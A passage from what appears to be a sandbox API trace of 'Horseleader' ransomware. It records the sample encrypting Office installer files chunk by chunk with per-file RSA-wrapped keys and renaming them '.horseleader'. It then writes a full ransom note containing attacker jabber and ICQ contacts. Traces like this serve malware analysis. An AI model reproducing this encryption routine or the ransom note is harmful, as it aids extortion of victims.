lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.726] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.727] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12f200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.727] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.731] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.731] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.732] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25e400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.732] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.736] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0135.736] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0135.737] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.737] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0135.737] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0135.737] CloseHandle (hObject=0x21c) returned 1 [0136.298] GetProcessHeap () returned 0x780000 [0136.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0136.299] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.horseleader") returned 96 [0136.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.horseleader")) returned 1 [0136.301] GetProcessHeap () returned 0x780000 [0136.301] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0136.301] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0136.301] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Windows") returned -1 [0136.301] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0136.302] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".horseleader") returned 0x0 [0136.302] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0136.302] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="_uninstalling_.png") returned 1 [0136.302] lstrlenW (lpString=".testttjffg") returned 11 [0136.302] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".testttjffg") returned 0x0 [0136.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0136.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0136.303] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0136.304] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0136.304] StrStrW (lpFirst="PowerPointMUI.xml", lpSrch=".txt") returned 0x0 [0136.304] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1450) returned 1 [0136.304] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0136.481] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.481] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5aa, lpOverlapped=0x0) returned 1 [0136.481] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.482] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0136.482] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0136.482] CloseHandle (hObject=0x21c) returned 1 [0136.486] GetProcessHeap () returned 0x780000 [0136.486] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0136.486] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.horseleader") returned 96 [0136.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.horseleader")) returned 1 [0136.491] GetProcessHeap () returned 0x780000 [0136.491] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0136.491] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0136.492] lstrcmpiW (lpString1="PptLR.cab", lpString2="Windows") returned -1 [0136.492] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0136.492] StrStrIW (lpFirst="PptLR.cab", lpSrch=".horseleader") returned 0x0 [0136.492] lstrcmpW (lpString1="PptLR.cab", lpString2="#Decrypt#.txt") returned 1 [0136.492] lstrcmpW (lpString1="PptLR.cab", lpString2="_uninstalling_.png") returned 1 [0136.492] lstrlenW (lpString=".testttjffg") returned 11 [0136.492] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab", lpSrch=".testttjffg") returned 0x0 [0136.492] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0136.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0136.493] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0136.494] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0136.494] StrStrW (lpFirst="PptLR.cab", lpSrch=".txt") returned 0x0 [0136.495] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=70361744) returned 1 [0136.495] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.495] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0136.595] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.595] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0136.595] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x218a948, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.595] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.090] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.090] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.090] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x4315290, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.090] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.119] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.120] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0137.120] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.120] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0137.120] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0137.121] CloseHandle (hObject=0x21c) returned 1 [0143.868] GetProcessHeap () returned 0x780000 [0143.869] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0143.869] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.horseleader") returned 88 [0143.869] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab.horseleader")) returned 1 [0143.871] GetProcessHeap () returned 0x780000 [0143.871] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0143.871] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0143.871] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0143.871] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0143.871] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0143.871] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0143.871] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0143.871] lstrlenW (lpString=".testttjffg") returned 11 [0143.871] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0143.871] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0143.872] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0143.872] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0143.873] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0143.873] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0143.873] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1886) returned 1 [0143.873] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x75e, lpOverlapped=0x0) returned 1 [0143.875] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0143.876] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x75e, lpOverlapped=0x0) returned 1 [0143.876] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.876] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0143.876] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0143.877] CloseHandle (hObject=0x21c) returned 1 [0143.879] GetProcessHeap () returned 0x780000 [0143.879] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc020 [0143.879] wnsprintfW (in: pszDest=0x7dc020, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0143.880] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0143.881] GetProcessHeap () returned 0x780000 [0143.881] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0143.881] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0143.881] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0143.881] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0143.881] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0143.882] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0143.882] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0143.884] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0143.884] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0143.884] CloseHandle (hObject=0x1cc) returned 1 [0143.885] GetProcessHeap () returned 0x780000 [0143.885] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0143.885] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, 